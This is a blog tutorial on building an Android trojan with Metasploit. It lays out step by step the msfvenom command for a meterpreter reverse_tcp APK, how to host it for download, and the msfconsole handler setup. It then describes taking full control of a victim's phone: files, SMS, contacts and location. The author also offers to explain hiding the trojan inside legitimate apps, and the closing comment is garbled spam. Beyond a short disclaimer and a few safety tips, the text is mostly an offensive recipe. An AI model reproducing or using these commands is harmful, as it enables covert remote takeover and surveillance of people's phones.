We will be seeing how can you hack onto your phone in 2022 using the Metasploit Framework. This attack will be done using a Trojan created using Metasploit
Disclaimer:- This post is only meant to illustrate these attacks and is purely for educational purposes only
What is Metasploit π€ ?
Metasploit is an open-source computer security project maintained and developed by Rapid7. It includes a set of tools that can help a cyber security analyst of an organization to find some bugs in their system and recommend some potential ways to solve them. It usually comes pre-installed in Kali Linux. It contains over 590 sets of modules that are essentially useful. Some of the Important ones are mentioned below
- Command shell enables users to run collection scripts or run arbitrary commands against the host.
- Meterpreter (the Metasploit Interpreter) enables users to control the screen of a device using VNC and to browse, upload and download files.
- Dynamic payloads enable users to evade anti-virus defense by generating unique payloads.
- Static payloads enable static IP address/port forwarding for communication between the host and the client system
Installing Metasploit
- You can run the following commands to install Metasploit onto your Linux server
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
- Metasploit is also available for other OS. You can learn about it by clicking on this here
- If you are looking for a cloud server to test out Metasploit then, do consider Vultr
Playing with Metasploit π
- For figuring out the public IP of our instance(VM in Cloud) We run
wget -qO - ipinfo.io
which would fetch you similar output to this π
{
"ip": "11.22.33.444",
"hostname": "8.9.8.1.bc.googleusercontent.com",
"city": "Singapore",
"region": "Singapore",
"country": "SG",
"loc": "1.2897,103.8501",
"org": "AS396982 Google LLC",
"postal": "018989",
"timezone": "Asia/Singapore",
"readme": "https://ipinfo.io/missingauth"
}
- The IP field in the JSON should be the public IP of your instance
- If you're running on your local network then you have to figure out the internal IP of your instance by running
ifconfig
- Before we further process we have to create a Trojan which we can easily create by running the command mentioned below
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.106.0.2 LPORT=4444 R> /var/www/html/payload.apk
-
-p argument indicates the payload that we are going to use. In this case, it will be
android/meterpreter/reverse_tcp
- LHOST will be the host to which you would like to receive the data from the victim. You should change this value to either the public or internal IP of your instance
- LPORT will be the port to which you want to receive the data from the victim. You could either change this value or use the default which is 4444
- R> will save the created payload in the specified directory with the specified extension
- Now go to the directory where the payload has been generated, In my case, it will be
cd /var/www/html
& runpython -m SimpleHTTPServer 1234
to spin up a temporary server on port 1234 - Now you can easily download the APK file onto your phone just by visiting
http://private_or_public_ip:1234/filename.apk
- Once you download the APK and file and try to install the application you might get a similar window popping up where you have to choose the Install anyway option
- Now head over to the instance's terminal and open Metasploit by running
msfconsole
& run the following commands
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit
- Please change the value of LHOST & LPORT to the one you configured earlier.
- Now open the application that you have installed. Ideally, the name should be Main Activity
- After you open the app, head over to the terminal, and now a new session must be opened wherein you can take the full control of the device
- It also includes some functions that we can use to interact with the Filesystem of the device
- You may also find some functions to get/send SMS or even get all the contacts
- To find the list of all the possible commands just run
?
orhelp
- Let's see how we can locate the current position of the user but just running one command that is
geolocate
Tips to stay away from a Trojan Attack β
- You should not download APKs from untrusted sources
- In this post, I've just shown to create a Trojan APK but real hackers might merge the trojans with legit Apps and ask us to download the APKs. If you would like to know how can we merge Trojan to another APK file do let me know in the comment section below
- You should examine the code before you install any opensource applications
Thanks for reading till the end. Do let me know if you have any queries in the comment section below π
Top comments (1)
Metasploit is an open-source computer security project maintained and developed by Rapid7. It includes a set of tools that can help close the location on iPhone in a cyber security analyst of an organization to find some bugs in their system. Share my location contains the list of apps granted permission to access your current location.